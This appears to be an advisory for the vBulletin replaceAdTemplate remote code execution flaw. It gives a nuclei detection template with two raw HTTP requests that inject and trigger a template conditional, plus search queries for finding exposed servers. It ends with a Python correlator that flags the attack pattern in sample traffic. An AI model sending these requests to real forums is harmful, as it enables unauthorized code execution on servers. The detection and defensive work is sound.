vBulletin versions 5.0.0 through 6.0.3 contain a Remote Code Execution (RCE) vulnerability in the ajax/api/ad/replaceAdTemplate endpoint. This flaw arises from improper use of PHP's Reflection API, allowing unauthenticated attackers to invoke protected controller methods. By injecting a crafted <vb:if> conditional that executes arbitrary PHP code via passthru($_POST[<param>]), and triggering it with a second request to ajax/render/ad_<location>, attackers can run arbitrary commands on the server as the webserver user.
PoC code [public]
id: CVE-2025-48828

info:
  name: vBulletin replaceAdTemplate - Remote Code Execution
  author: DhiyaneshDK, Chocapikk
  severity: critical
  description: |
    vBulletin versions 5.0.0 through 6.0.3 contain a Remote Code Execution (RCE) vulnerability in the ajax/api/ad/replaceAdTemplate endpoint. This flaw arises from improper use of PHP's Reflection API, allowing unauthenticated attackers to invoke protected controller methods. By injecting a crafted <vb:if> conditional that executes arbitrary PHP code via passthru($_POST[<param>]), and triggering it with a second request to ajax/render/ad_<location>, attackers can run arbitrary commands on the server as the webserver user.
  impact: |
    Successful exploitation allows unauthenticated remote attackers to execute arbitrary system commands as the web server user, resulting in full system compromise.
  remediation: |
    Upgrade to vBulletin 6.0.4+ and apply the official patch to restrict access to protected controller methods and secure the ajax/api/ad/replaceAdTemplate endpoint.
  reference:
    - https://karmainsecurity.com/pocs/vBulletin-replaceAdTemplate-RCE.php
    - https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
    - https://nvd.nist.gov/vuln/detail/CVE-2025-48827
    - https://nvd.nist.gov/vuln/detail/CVE-2025-48828
  classification:
    epss-score: 0.68656
    epss-percentile: 0.98578
    cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-48828
    cwe-id: CWE-424
  metadata:
    verified: true
    max-request: 1
    vendor: vbulletin
    product: vbulletin
    fofa-query: app="vBulletin"
    shodan-query: http.component:"vBulletin"
  tags: cve,cve2025,rce,vbulletin,intrusive,vkev

variables:
  rand_string: "{{to_lower(rand_base(5))}}"
  rand_value: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        routestring=ajax/api/ad/replaceAdTemplate&styleid=1&location={{rand_string}}&template=<vb:if condition='"var_dump"("{{rand_value}}")'></vb:if>

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body,'string(5)','{{rand_value}}')
        condition: and

  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        routestring=ajax/render/ad_{{rand_string}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body,'string(5)','{{rand_value}}')
        condition: and
# digest: 4a0a00473045022100b78d941d13114dc78919e05a7f7057a38e758274ca01fd5563befb8059a2266002200a69ecc0d034427ed2328c63222acaa9284a2f9e3de49c15be601f9a9684e75d:922c64590222798bb761d5b6d8e72950
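As an added, defender-side example that is not part of the nuclei template above or of vBulletin itself: a small Python correlator that flags the two-step pattern the description lays out, a non-administrative client writing template directives into an ad location through ajax/api/ad/replaceAdTemplate, followed by a fetch of ajax/render/ad_<location> from the same source. The request records, their field names (src, admin_session, method, path, body) and the admin-session scoping are this example's own assumptions; the sample traffic is constructed and mirrors the benign var_dump probe the template sends. A real deployment would feed it from a WAF or reverse proxy that records POST bodies, since ordinary access logs do not contain the routestring parameter.

```python
"""Correlate vBulletin ad-template writes with subsequent renders.
Added example; request records are constructed, not real traffic."""
import re
from urllib.parse import parse_qs, urlparse

STAGE_ROUTE = "ajax/api/ad/replaceAdTemplate"
RENDER_PREFIX = "ajax/render/ad_"
# vBulletin template directives. A 'template' parameter arriving from a
# client that is not an authenticated administrator should never contain
# these, which is the condition the advisory above describes.
TEMPLATE_CODE_RE = re.compile(r"<vb:if\b|\{vb:", re.IGNORECASE)

# Constructed sample traffic (the field names are this example's own).
# Records 0 and 1 mirror the template's var_dump probe from one source;
# record 2 is an administrator edit; record 3 is unrelated browsing.
SAMPLE_REQUESTS = [
    {"src": "198.51.100.7", "admin_session": False, "method": "POST", "path": "/",
     "body": "routestring=ajax/api/ad/replaceAdTemplate&styleid=1&location=abcde"
             "&template=<vb:if condition='\"var_dump\"(\"xyzab\")'></vb:if>"},
    {"src": "198.51.100.7", "admin_session": False, "method": "POST", "path": "/",
     "body": "routestring=ajax/render/ad_abcde"},
    {"src": "203.0.113.9", "admin_session": True, "method": "POST", "path": "/",
     "body": "routestring=ajax/api/ad/replaceAdTemplate&styleid=1&location=header"
             "&template=<vb:if condition='$show[\"member\"]'>hi</vb:if>"},
    {"src": "203.0.113.9", "admin_session": False, "method": "GET",
     "path": "/forum/index.php", "body": ""},
]


def route_of(req):
    """Return the vBulletin route for a request, or None. The PoC passes the
    route in a 'routestring' form parameter; the URL path is checked as a
    fallback so path-style requests are classified the same way."""
    params = parse_qs(req.get("body", ""), keep_blank_values=True)
    if "routestring" in params:
        return params["routestring"][0].strip("/")
    path = urlparse(req.get("path", "/")).path.strip("/")
    return path or None


def classify(req):
    """Label a request as a 'stage' (template write) or 'render' (template
    fetch) for an ad location, or return None when it is neither."""
    route = route_of(req)
    if route is None:
        return None
    params = parse_qs(req.get("body", ""), keep_blank_values=True)
    if route == STAGE_ROUTE:
        template = params.get("template", [""])[0]
        return {"kind": "stage",
                "location": params.get("location", [""])[0],
                "has_template_code": bool(TEMPLATE_CODE_RE.search(template))}
    if route.startswith(RENDER_PREFIX):
        return {"kind": "render", "location": route[len(RENDER_PREFIX):]}
    return None


def correlate(requests):
    """Walk requests in arrival order and return alerts. A non-admin client
    writing template directives into an ad location is 'high'; the same
    client later rendering that location is 'critical', because the render
    step is what evaluates the staged directive."""
    staged = {}  # (src, location) -> index of the staging request
    alerts = []
    for i, req in enumerate(requests):
        hit = classify(req)
        if hit is None:
            continue
        key = (req.get("src"), hit["location"])
        if hit["kind"] == "stage":
            if hit["has_template_code"] and not req.get("admin_session", False):
                staged[key] = i
                alerts.append({"severity": "high", "src": key[0],
                               "location": key[1], "index": i,
                               "reason": "template directive written by non-admin client"})
        elif key in staged:
            alerts.append({"severity": "critical", "src": key[0],
                           "location": key[1], "index": i,
                           "reason": f"render of location staged at request {staged[key]}"})
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_REQUESTS):
        print(alert)
```

The admin_session scoping is the important design choice: the endpoint exists so that administrators can manage ad templates, and the finding in the advisory is that it also honours calls from unauthenticated users, so the rule should fire on the missing authorization rather than on the presence of <vb:if> alone. Correlating by (source, location) keeps the critical alert tied to the pair of requests that actually completes the chain.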